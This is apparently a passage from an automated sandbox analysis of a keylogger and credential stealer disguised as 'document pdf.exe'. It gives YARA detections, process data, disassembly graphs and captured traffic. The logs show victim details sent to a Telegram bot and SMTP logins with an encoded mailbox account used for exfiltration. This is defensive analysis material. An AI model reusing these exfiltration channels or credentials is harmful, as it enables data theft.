                                                                                                                      Content-Length: 362
                                                                                                                      Connection: close
                                                                                                                      Age: 1490473
                                                                                                                      Cache-Control: max-age=31536000
                                                                                                                      cf-cache-status: HIT
                                                                                                                      last-modified: Fri, 20 Dec 2024 09:00:10 GMT
                                                                                                                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=%2FCkliXeu8K%2BRDxd63KICewGd4WYAu1sEFMfywBzPMZ0LBqPEQ4Ns9tli6k8kyEGLLp%2FHNgiKpwyZ0xANIzYJy4kmHB7rZUWNXnrQdryoQaRctOrHG%2BUC6o3LXtx0w0w6p1S%2BZ5jB"}],"group":"cf-nel","max_age":604800}
                                                                                                                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                      Server: cloudflare
                                                                                                                      CF-RAY: 8fdc954d4a9a78d6-EWR
                                                                                                                      alt-svc: h3=":443"; ma=86400
                                                                                                                      server-timing: cfL4;desc="?proto=TCP&rtt=2042&min_rtt=1986&rtt_var=784&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2848&recv_bytes=699&delivery_rate=1470292&cwnd=147&unsent_bytes=0&cid=2ccf5eeecabe51d3&ts=144&x=0"
                                                                                                                      2025-01-06 15:01:24 UTC362INData Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a 6f
                                                                                                                      Data Ascii: <Response><IP>8.46.123.189</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZo


                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                      9192.168.2.649847149.154.167.2204432672C:\Users\user\Desktop\document pdf.exe
                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                      2025-01-06 15:01:25 UTC349OUTGET /bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:680718%0D%0ADate%20and%20Time:%2007/01/2025%20/%2000:14:20%0D%0ACountry%20Name:%20United%20States%0D%0A%5B%20680718%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5D HTTP/1.1
                                                                                                                      Host: api.telegram.org
                                                                                                                      Connection: Keep-Alive
                                                                                                                      2025-01-06 15:01:25 UTC344INHTTP/1.1 404 Not Found
                                                                                                                      Server: nginx/1.18.0
                                                                                                                      Date: Mon, 06 Jan 2025 15:01:25 GMT
                                                                                                                      Content-Type: application/json
                                                                                                                      Content-Length: 55
                                                                                                                      Connection: close
                                                                                                                      Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                                      Access-Control-Allow-Origin: *
                                                                                                                      Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                                                                                      2025-01-06 15:01:25 UTC55INData Raw: 7b 22 6f 6b 22 3a 66 61 6c 73 65 2c 22 65 72 72 6f 72 5f 63 6f 64 65 22 3a 34 30 34 2c 22 64 65 73 63 72 69 70 74 69 6f 6e 22 3a 22 4e 6f 74 20 46 6f 75 6e 64 22 7d
                                                                                                                      Data Ascii: {"ok":false,"error_code":404,"description":"Not Found"}


                                                                                                                      SMTP Packets

                                                                                                                      TimestampSource PortDest PortSource IPDest IPCommands
                                                                                                                      Jan 6, 2025 16:01:32.010430098 CET58749890208.91.199.225192.168.2.6220 us2.outbound.mailhostbox.com ESMTP Postfix
                                                                                                                      Jan 6, 2025 16:01:32.010634899 CET49890587192.168.2.6208.91.199.225EHLO 680718
                                                                                                                      Jan 6, 2025 16:01:32.162626982 CET58749890208.91.199.225192.168.2.6250-us2.outbound.mailhostbox.com
                                                                                                                      250-PIPELINING
                                                                                                                      250-SIZE 41648128
                                                                                                                      250-VRFY
                                                                                                                      250-ETRN
                                                                                                                      250-STARTTLS
                                                                                                                      250-AUTH PLAIN LOGIN
                                                                                                                      250-AUTH=PLAIN LOGIN
                                                                                                                      250-ENHANCEDSTATUSCODES
                                                                                                                      250-8BITMIME
                                                                                                                      250-DSN
                                                                                                                      250 CHUNKING
                                                                                                                      Jan 6, 2025 16:01:32.163796902 CET49890587192.168.2.6208.91.199.225AUTH login ZGlyZWN0b3JAaWdha3Vpbi5jb20=
                                                                                                                      Jan 6, 2025 16:01:32.318629026 CET58749890208.91.199.225192.168.2.6334 UGFzc3dvcmQ6
                                                                                                                      Jan 6, 2025 16:01:32.482357979 CET58749890208.91.199.225192.168.2.6235 2.7.0 Authentication successful
                                                                                                                      Jan 6, 2025 16:01:32.482727051 CET49890587192.168.2.6208.91.199.225MAIL FROM:<director@igakuin.com>
                                                                                                                      Jan 6, 2025 16:01:32.636765957 CET58749890208.91.199.225192.168.2.6250 2.1.0 Ok
                                                                                                                      Jan 6, 2025 16:01:32.642741919 CET49890587192.168.2.6208.91.199.225RCPT TO:<director@igakuin.com>
                                                                                                                      Jan 6, 2025 16:01:32.811463118 CET58749890208.91.199.225192.168.2.6550 5.4.6 <director@igakuin.com>: Recipient address rejected: Email Sending Quota Exceeded
                                                                                                                      Jan 6, 2025 16:01:34.888252020 CET58749910208.91.199.225192.168.2.6220 us2.outbound.mailhostbox.com ESMTP Postfix
                                                                                                                      Jan 6, 2025 16:01:34.888520956 CET49910587192.168.2.6208.91.199.225EHLO 680718
                                                                                                                      Jan 6, 2025 16:01:35.041076899 CET58749910208.91.199.225192.168.2.6250-us2.outbound.mailhostbox.com
                                                                                                                      250-PIPELINING
                                                                                                                      250-SIZE 41648128
                                                                                                                      250-VRFY
                                                                                                                      250-ETRN
                                                                                                                      250-STARTTLS
                                                                                                                      250-AUTH PLAIN LOGIN
                                                                                                                      250-AUTH=PLAIN LOGIN
                                                                                                                      250-ENHANCEDSTATUSCODES
                                                                                                                      250-8BITMIME
                                                                                                                      250-DSN
                                                                                                                      250 CHUNKING
                                                                                                                      Jan 6, 2025 16:01:35.041270971 CET49910587192.168.2.6208.91.199.225AUTH login ZGlyZWN0b3JAaWdha3Vpbi5jb20=
                                                                                                                      Jan 6, 2025 16:01:35.193973064 CET58749910208.91.199.225192.168.2.6334 UGFzc3dvcmQ6
                                                                                                                      Jan 6, 2025 16:01:35.350573063 CET58749910208.91.199.225192.168.2.6235 2.7.0 Authentication successful
                                                                                                                      Jan 6, 2025 16:01:35.353735924 CET49910587192.168.2.6208.91.199.225MAIL FROM:<director@igakuin.com>
                                                                                                                      Jan 6, 2025 16:01:35.505721092 CET58749910208.91.199.225192.168.2.6250 2.1.0 Ok
                                                                                                                      Jan 6, 2025 16:01:35.508920908 CET49910587192.168.2.6208.91.199.225RCPT TO:<director@igakuin.com>
                                                                                                                      Jan 6, 2025 16:01:35.675283909 CET58749910208.91.199.225192.168.2.6550 5.4.6 <director@igakuin.com>: Recipient address rejected: Email Sending Quota Exceeded

                                                                                                                      Statistics

                                                                                                                      CPU Usage

                                                                                                                      Click to jump to process

                                                                                                                      Memory Usage

                                                                                                                      Click to jump to process

                                                                                                                      High Level Behavior Distribution

                                                                                                                      Click to dive into process behavior distribution

                                                                                                                      Behavior

                                                                                                                      Click to jump to process

                                                                                                                      System Behavior

                                                                                                                      General

                                                                                                                      Target ID:0
                                                                                                                      Start time:10:01:07
                                                                                                                      Start date:06/01/2025
                                                                                                                      Path:C:\Users\user\Desktop\document pdf.exe
                                                                                                                      Wow64 process (32bit):true
                                                                                                                      Commandline:"C:\Users\user\Desktop\document pdf.exe"
                                                                                                                      Imagebase:0xde0000
                                                                                                                      File size:759'808 bytes
                                                                                                                      MD5 hash:C67B6FF2D472BF82DC4DA545DBC37A43
                                                                                                                      Has elevated privileges:true
                                                                                                                      Has administrator privileges:true
                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                      Yara matches:
                                                                                                                      • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000002.2273766316.00000000041B9000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                      • Rule: JoeSecurity_VIPKeylogger, Description: Yara detected VIP Keylogger, Source: 00000000.00000002.2273766316.00000000041B9000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                      • Rule: JoeSecurity_TelegramRAT, Description: Yara detected Telegram RAT, Source: 00000000.00000002.2273766316.00000000041B9000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                      • Rule: Windows_Trojan_SnakeKeylogger_af3faa65, Description: unknown, Source: 00000000.00000002.2273766316.00000000041B9000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                                                                                                                      Reputation:low
                                                                                                                      Has exited:true

                                                                                                                      General

                                                                                                                      Target ID:3
                                                                                                                      Start time:10:01:08
                                                                                                                      Start date:06/01/2025
                                                                                                                      Path:C:\Users\user\Desktop\document pdf.exe
                                                                                                                      Wow64 process (32bit):true
                                                                                                                      Commandline:"C:\Users\user\Desktop\document pdf.exe"
                                                                                                                      Imagebase:0x630000
                                                                                                                      File size:759'808 bytes
                                                                                                                      MD5 hash:C67B6FF2D472BF82DC4DA545DBC37A43
                                                                                                                      Has elevated privileges:true
                                                                                                                      Has administrator privileges:true
                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                      Yara matches:
                                                                                                                      • Rule: JoeSecurity_VIPKeylogger, Description: Yara detected VIP Keylogger, Source: 00000003.00000002.4665157890.0000000002C63000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                      • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000003.00000002.4662245405.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                      • Rule: JoeSecurity_VIPKeylogger, Description: Yara detected VIP Keylogger, Source: 00000003.00000002.4662245405.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                      • Rule: JoeSecurity_TelegramRAT, Description: Yara detected Telegram RAT, Source: 00000003.00000002.4662245405.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                      • Rule: Windows_Trojan_SnakeKeylogger_af3faa65, Description: unknown, Source: 00000003.00000002.4662245405.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: unknown
                                                                                                                      • Rule: JoeSecurity_SnakeKeylogger, Description: Yara detected Snake Keylogger, Source: 00000003.00000002.4665157890.0000000002A71000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                      Reputation:low
                                                                                                                      Has exited:false

                                                                                                                      General

                                                                                                                      Target ID:6
                                                                                                                      Start time:10:01:08
                                                                                                                      Start date:06/01/2025
                                                                                                                      Path:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                      Wow64 process (32bit):true
                                                                                                                      Commandline:C:\Windows\SysWOW64\WerFault.exe -u -p 3420 -s 1340
                                                                                                                      Imagebase:0xbd0000
                                                                                                                      File size:483'680 bytes
                                                                                                                      MD5 hash:C31336C1EFC2CCB44B4326EA793040F2
                                                                                                                      Has elevated privileges:true
                                                                                                                      Has administrator privileges:true
                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                      Reputation:high
                                                                                                                      Has exited:true

                                                                                                                      Disassembly

                                                                                                                      Reset < >

                                                                                                                        Execution Graph

                                                                                                                        Execution Coverage:10.2%
                                                                                                                        Dynamic/Decrypted Code Coverage:97%
                                                                                                                        Signature Coverage:3%
                                                                                                                        Total number of Nodes:101
                                                                                                                        Total number of Limit Nodes:6
                                                                                                                        execution_graph 42624 580ab00 42625 580ab3a 42624->42625 42626 580abb6 42625->42626 42627 580abcb 42625->42627 42632 58098cc 42626->42632 42629 58098cc 3 API calls 42627->42629 42631 580abda 42629->42631 42633 58098d7 42632->42633 42634 580abc1 42633->42634 42637 580bdd0 42633->42637 42644 580bdbf 42633->42644 42638 580bdd1 42637->42638 42651 5809a0c 42638->42651 42640 580bdf7 42640->42634 42641 580be21 CreateIconFromResourceEx 42643 580be9e 42641->42643 42643->42634 42645 580bdcc 42644->42645 42646 5809a0c CreateIconFromResourceEx 42645->42646 42649 580bdea 42646->42649 42647 580bdf7 42647->42634 42648 580be21 CreateIconFromResourceEx 42650 580be9e 42648->42650 42649->42647 42649->42648 42650->42634 42652 580be20 CreateIconFromResourceEx 42651->42652 42654 580bdea 42652->42654 42654->42640 42654->42641 42655 57122e0 42658 5711740 42655->42658 42659 5712330 CreateWindowExW 42658->42659 42661 5712454 42659->42661 42661->42661 42662 306b6d0 42665 306b7b7 42662->42665 42663 306b6df 42666 306b7fc 42665->42666 42667 306b7d9 42665->42667 42666->42663 42667->42666 42668 306ba00 GetModuleHandleW 42667->42668 42669 306ba2d 42668->42669 42669->42663 42670 306da60 42671 306daa6 42670->42671 42674 306dc40 42671->42674 42677 306d818 42674->42677 42678 306dca8 DuplicateHandle 42677->42678 42679 306db93 42678->42679 42680 176d01c 42681 176d034 42680->42681 42682 176d08e 42681->42682 42687 5713248 42681->42687 42696 571176c 42681->42696 42705 57124d8 42681->42705 42709 57124e8 42681->42709 42690 5713285 42687->42690 42688 57132b9 42726 5711894 42688->42726 42690->42688 42691 57132a9 42690->42691 42713 57133d1 42691->42713 42717 57134ac 42691->42717 42722 57133e0 42691->42722 42692 57132b7 42697 5711777 42696->42697 42698 57132b9 42697->42698 42700 57132a9 42697->42700 42699 5711894 CallWindowProcW 42698->42699 42701 57132b7 42699->42701 42702 57133d1 CallWindowProcW 42700->42702 42703 57133e0 CallWindowProcW 42700->42703 42704 57134ac CallWindowProcW 42700->42704 42702->42701 42703->42701 42704->42701 42706 571250e 42705->42706 42707 571176c CallWindowProcW 42706->42707 42708 571252f 42707->42708 42708->42682 42710 571250e 42709->42710 42711 571176c CallWindowProcW 42710->42711 42712 571252f 42711->42712 42712->42682 42714 57133f4 42713->42714 42730 5713498 42714->42730 42715 5713480 42715->42692 42718 571346a 42717->42718 42719 57134ba 42717->42719 42721 5713498 CallWindowProcW 42718->42721 42720 5713480 42720->42692 42721->42720 42724 57133f4 42722->42724 42723 5713480 42723->42692 42725 5713498 CallWindowProcW 42724->42725 42725->42723 42727 571189f 42726->42727 42728 571499a CallWindowProcW 42727->42728 42729 5714949 42727->42729 42728->42729 42729->42692 42731 57134a9 42730->42731 42733 57148db 42730->42733 42731->42715 42734 5711894 CallWindowProcW 42733->42734 42735 57148ea 42734->42735 42735->42731 42736 3064668 42737 3064672 42736->42737 42739 3064759 42736->42739 42740 306477d 42739->42740 42744 3064868 42740->42744 42748 3064859 42740->42748 42746 306488f 42744->42746 42745 306496c 42745->42745 42746->42745 42752 30644c4 42746->42752 42750 3064868 42748->42750 42749 306496c 42749->42749 42750->42749 42751 30644c4 CreateActCtxA 42750->42751 42751->42749 42753 30658f8 CreateActCtxA 42752->42753 42755 30659bb 42753->42755 42755->42755

                                                                                                                        Executed Functions

                                                                                                                        Function 05717490 Relevance: 5.5, Strings: 4, Instructions: 500COMMON
                                                                                                                        Download Yara Rule

                                                                                                                        Control-flow Graph

                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.2275364495.0000000005710000.00000040.00000800.00020000.00000000.sdmp, Offset: 05710000, based on PE: false
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_5710000_document pdf.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID: )$/$K$]
                                                                                                                        • API String ID: 0-2940783203
                                                                                                                        • Opcode ID: 14cf0e2627c566444fa6540d01ef546b604a066a786115e6efd941adac52baba
                                                                                                                        • Instruction ID: 802bcbf09a4eacf8a84651e9da7914464ce37e26487df9c04d7846dc567fed4c
                                                                                                                        • Opcode Fuzzy Hash: 14cf0e2627c566444fa6540d01ef546b604a066a786115e6efd941adac52baba
                                                                                                                        • Instruction Fuzzy Hash: 00224C30A00705CFDB19EF78C89869AB7B2FF89300F1485A9D9096F365DF75A985CB90
                                                                                                                        Function 05717480 Relevance: 5.5, Strings: 4, Instructions: 489COMMON
                                                                                                                        Download Yara Rule

                                                                                                                        Control-flow Graph

                                                                                                                        • Executed
                                                                                                                        • Not Executed
                                                                                                                        control_flow_graph 157 5717480-5717482 158 5717484-5717488 157->158 159 5717489-571748a 157->159 158->159 160 571746e-571747f 158->160 161 5717491-57174fe 159->161 162 571748b-5717490 159->162 160->157 171 5717508-571750c call 5717304 161->171 162->161 173 5717511-571751c 171->173 175 5717526-571752a call 5717314 173->175 177 571752f-57175ac call 5717324 call 5717334 call 5717324 175->177 192 57175b3-57175c4 call 5717344 177->192 194 57175c9-571760b call 5717354 call 5717364 192->194 198 5717610-571761a call 5717374 194->198 200 571761f-571766a call 5717384 call 5717394 198->200 207 571766f-571767c 200->207 315 571767f call 571bf98 207->315 316 571767f call 571bf88 207->316 208 5717682-57176c4 call 5717344 call 5717354 212 57176c9-57176f8 call 5717364 208->212 214 57176fd-571778d call 5717374 212->214 225 5717794-571779b 214->225 313 571779d call 5802908 225->313 314 571779d call 5802918 225->314 226 57177a3-57177b8 228 5717bd2-5717be3 226->228 229 57177be-57177d7 226->229 232 5717be8-5717c02 call 5717434 228->232 229->228 233 57177dd-5717802 229->233 235 5717c07-5717c17 232->235 233->228 239 5717808-571782d 233->239 239->228 242 5717833-5717880 239->242 249 5717887-5717898 242->249 317 571789a call 5803938 249->317 318 571789a call 5803948 249->318 250 57178a0-57178a2 251 57178a4-57178aa 250->251 252 57178ba-57178be 250->252 253 57178ac 251->253 254 57178ae-57178b0 251->254 255 57178c4-57178c8 252->255 253->252 254->252 255->228 256 57178ce-57178d1 255->256 257 57178dc 256->257 258 57178e8-57179cc call 57173a4 call 5717344 call 5717354 call 5717364 call 57173b4 call 57173c4 call 57173d4 257->258 276 57179d4-57179e0 call 57173e4 258->276 278 57179e5-5717a6e call 57173f4 call 5717404 276->278 287 5717a79-5717a95 278->287 309 5717a98 call 5808eb0 287->309 310 5717a98 call 5808e9e 287->310 288 5717a9b-5717ad0 311 5717ad2 call 5809300 288->311 312 5717ad2 call 5809310 288->312 289 5717ad7-5717b08 call 5717414 294 5717b20-5717bb5 call 5717424 call 5717354 289->294 295 5717b0a-5717b10 289->295 305 5717bc1-5717bc3 294->305 296 5717b12 295->296 297 5717b14-5717b16 295->297 296->294 297->294 307 5717bc5 call 580c128 305->307 308 5717bc5 call 580c138 305->308 306 5717bca-5717bd1 307->306 308->306 309->288 310->288 311->289 312->289 313->226 314->226 315->208 316->208 317->250 318->250
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.2275364495.0000000005710000.00000040.00000800.00020000.00000000.sdmp, Offset: 05710000, based on PE: false
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_5710000_document pdf.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID: )$/$K$]
                                                                                                                        • API String ID: 0-2940783203
                                                                                                                        • Opcode ID: fceefacebf101e80e599571e4993efda2799a7eb110389afd7c9b0c15dd47570
                                                                                                                        • Instruction ID: 726f518118eda5b71ded18ec6578992f7a6d206508f2fd957ec89a852d839319
                                                                                                                        • Opcode Fuzzy Hash: fceefacebf101e80e599571e4993efda2799a7eb110389afd7c9b0c15dd47570
                                                                                                                        • Instruction Fuzzy Hash: CC225C30A00745CFCB19EF78C89869ABBB2FF85300F1485A9D8096F365DF75A985CB91
                                                                                                                        Function 05804E38 Relevance: 3.2, Instructions: 3181COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.2275577156.0000000005800000.00000040.00000800.00020000.00000000.sdmp, Offset: 05800000, based on PE: false
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_5800000_document pdf.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID:
                                                                                                                        • API String ID:
                                                                                                                        • Opcode ID: 5cf1a88c41d21b78c83a8e327102417b9f40ca0420d0ecdde017cedfceecd428
                                                                                                                        • Instruction ID: 1bb5afd4dc07df046fdc8d79aacfa7bd13e8e403d049c5bda25e685b5f1d033d
                                                                                                                        • Opcode Fuzzy Hash: 5cf1a88c41d21b78c83a8e327102417b9f40ca0420d0ecdde017cedfceecd428
                                                                                                                        • Instruction Fuzzy Hash: 4863EA74A04219CFDB64DF68C888A9EB7B2FF89310F159595D819EB2A1DB30ED81CF50
                                                                                                                        Function 058040D0 Relevance: .7, Instructions: 726COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.2275577156.0000000005800000.00000040.00000800.00020000.00000000.sdmp, Offset: 05800000, based on PE: false
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_5800000_document pdf.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID:
                                                                                                                        • API String ID:
                                                                                                                        • Opcode ID: 9c885db1dcfa92a988da612841b71cbcc15feb17fe088f5a6cf95f7653fd3438
                                                                                                                        • Instruction ID: b487e82859f62e10d2d099f12c9712535dfc7d7c0ab4405c3c12f05238b3df98
                                                                                                                        • Opcode Fuzzy Hash: 9c885db1dcfa92a988da612841b71cbcc15feb17fe088f5a6cf95f7653fd3438
                                                                                                                        • Instruction Fuzzy Hash: AE526B34A402199FDF54DF68C884A6DBBB2BF88310B159169ED16DB3B5DB31EC41CB90
                                                                                                                        Function 058098CC Relevance: .6, Instructions: 623COMMON
                                                                                                                        Download Yara Rule

                                                                                                                        Control-flow Graph

                                                                                                                        • Executed
                                                                                                                        • Not Executed
                                                                                                                        control_flow_graph 1964 58098cc-580ac20 1968 580b0e6-580b14c 1964->1968 1969 580ac26-580ac2b 1964->1969 1975 580b153-580b1db 1968->1975 1969->1968 1970 580ac31-580ac4e 1969->1970 1970->1975 1976 580ac54-580ac58 1970->1976 2024 580b1e6-580b268 1975->2024 1978 580ac67-580ac6b 1976->1978 1979 580ac5a-580ac64 call 580990c 1976->1979 1980 580ac7a-580ac81 1978->1980 1981 580ac6d-580ac77 call 580990c 1978->1981 1979->1978 1986 580ac87-580aca1 1980->1986 1987 580ad79-580ad7e 1980->1987 1981->1980 2003 580aca9-580ad6d call 5809918 * 2 1986->2003 1990 580ad80-580ad84 1987->1990 1991 580ad86-580ad8b 1987->1991 1990->1991 1994 580ad8d-580ad91 1990->1994 1995 580ad9d-580adcd call 5809924 * 3 1991->1995 1999 580ad97-580ad9a 1994->1999 2000 580b479-580b48a 1994->2000 2023 580add3-580add6 1995->2023 1995->2024 1999->1995 2009 580b491-580b494 2000->2009 2010 580b48c 2000->2010 2003->1987 2031 580ad6f 2003->2031 2013 580b495-580b4cb 2009->2013 2010->2013 2014 580b48e 2010->2014 2014->2009 2023->2024 2025 580addc-580adde 2023->2025 2038 580b270-580b2f2 2024->2038 2025->2024 2029 580ade4-580ae19 2025->2029 2029->2038 2039 580ae1f-580ae28 2029->2039 2031->1987 2046 580b2fa-580b37c 2038->2046 2040 580af8b-580af8f 2039->2040 2041 580ae2e-580ae88 call 5809924 * 2 call 5809934 * 2 2039->2041 2045 580af95-580af99 2040->2045 2040->2046 2086 580ae9a 2041->2086 2087 580ae8a-580ae93 2041->2087 2048 580b384-580b3b1 2045->2048 2049 580af9f-580afa5 2045->2049 2046->2048 2063 580b3b8-580b43a 2048->2063 2053 580afa7 2049->2053 2054 580afa9-580afde 2049->2054 2057 580afe5-580afeb 2053->2057 2054->2057 2062 580aff1-580aff9 2057->2062 2057->2063 2067 580b000-580b002 2062->2067 2068 580affb-580afff 2062->2068 2119 580b442-580b471 2063->2119 2076 580b064-580b06a 2067->2076 2077 580b004-580b028 2067->2077 2068->2067 2078 580b089-580b0be 2076->2078 2079 580b06c-580b087 2076->2079 2105 580b031-580b035 2077->2105 2106 580b02a-580b02f 2077->2106 2098 580b0c5-580b0d1 2078->2098 2079->2098 2091 580ae9e-580aea0 2086->2091 2087->2091 2093 580ae95-580ae98 2087->2093 2100 580aea2 2091->2100 2101 580aea7-580aeab 2091->2101 2093->2091 2098->2119 2120 580b0d7-580b0e3 2098->2120 2100->2101 2103 580aeb9-580aebf 2101->2103 2104 580aead-580aeb4 2101->2104 2114 580aec1-580aec7 2103->2114 2115 580aec9-580aece 2103->2115 2108 580af56-580af5a 2104->2108 2105->2000 2110 580b03b-580b03e 2105->2110 2111 580b041-580b052 2106->2111 2117 580af79-580af85 2108->2117 2118 580af5c-580af76 2108->2118 2110->2111 2157 580b054 call 580bdd0 2111->2157 2158 580b054 call 580bdbf 2111->2158 2121 580aed4-580aeda 2114->2121 2115->2121 2117->2040 2117->2041 2118->2117 2119->2000 2125 580aee0-580aee5 2121->2125 2126 580aedc-580aede 2121->2126 2131 580aee7-580aef9 2125->2131 2126->2131 2128 580b05a-580b062 2128->2098 2136 580af03-580af08 2131->2136 2137 580aefb-580af01 2131->2137 2139 580af0e-580af15 2136->2139 2137->2139 2143 580af17-580af19 2139->2143 2144 580af1b 2139->2144 2147 580af20-580af2b 2143->2147 2144->2147 2148 580af2d-580af30 2147->2148 2149 580af4f 2147->2149 2148->2108 2151 580af32-580af38 2148->2151 2149->2108 2153 580af3a-580af3d 2151->2153 2154 580af3f-580af48 2151->2154 2153->2149 2153->2154 2154->2108 2156 580af4a-580af4d 2154->2156 2156->2108 2156->2149 2157->2128 2158->2128
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.2275577156.0000000005800000.00000040.00000800.00020000.00000000.sdmp, Offset: 05800000, based on PE: false
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_5800000_document pdf.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID:
                                                                                                                        • API String ID:
                                                                                                                        • Opcode ID: ac3a853df9ad8b771b665e8f200713893a5836b7f1891943b44b87f2bf5ad902
                                                                                                                        • Instruction ID: 1384857f6295fc8f6750c61dfb53af24351a291e72731b8ecea75f3e2bb448a3
                                                                                                                        • Opcode Fuzzy Hash: ac3a853df9ad8b771b665e8f200713893a5836b7f1891943b44b87f2bf5ad902
                                                                                                                        • Instruction Fuzzy Hash: CF325F70E003198FDB98DFA9C8547AEBBF2BF84700F14956AD809EB295DB349D41CB91
                                                                                                                        Function 05802918 Relevance: .4, Instructions: 401COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.2275577156.0000000005800000.00000040.00000800.00020000.00000000.sdmp, Offset: 05800000, based on PE: false
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_5800000_document pdf.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID:
                                                                                                                        • API String ID:
                                                                                                                        • Opcode ID: bebd62997d4b815cf1c5f309c0af13b7bba05875a5ac57113e2585640734256e
                                                                                                                        • Instruction ID: 8c49127a7229a741ff34ab626c97310042b2ab30402d80efe593415d60183934
                                                                                                                        • Opcode Fuzzy Hash: bebd62997d4b815cf1c5f309c0af13b7bba05875a5ac57113e2585640734256e
                                                                                                                        • Instruction Fuzzy Hash: D5F1CF34A0525ACFCB55DB68DC88ABDFBB2FF81300F048566D852DB296CB749C46CB80
                                                                                                                        Function 0580ABE8 Relevance: .3, Instructions: 277COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.2275577156.0000000005800000.00000040.00000800.00020000.00000000.sdmp, Offset: 05800000, based on PE: false
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_5800000_document pdf.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID:
                                                                                                                        • API String ID:
                                                                                                                        • Opcode ID: 5ae5a0dc5fd12ac7728152579310c0b5535566559fbd9dc58dd80c93a218ad19
                                                                                                                        • Instruction ID: 9e76cccc9adad3e126a26d61a934dab6fdfb98df9338bf7168120f2ad8b38fa0
                                                                                                                        • Opcode Fuzzy Hash: 5ae5a0dc5fd12ac7728152579310c0b5535566559fbd9dc58dd80c93a218ad19
                                                                                                                        • Instruction Fuzzy Hash: 86C15C31A003488FDF54DFA9D884B9EBBF2BF88310F14916AD849EB295DB309D85CB51
                                                                                                                        Function 058098C4 Relevance: .3, Instructions: 271COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        Memory Dump Source
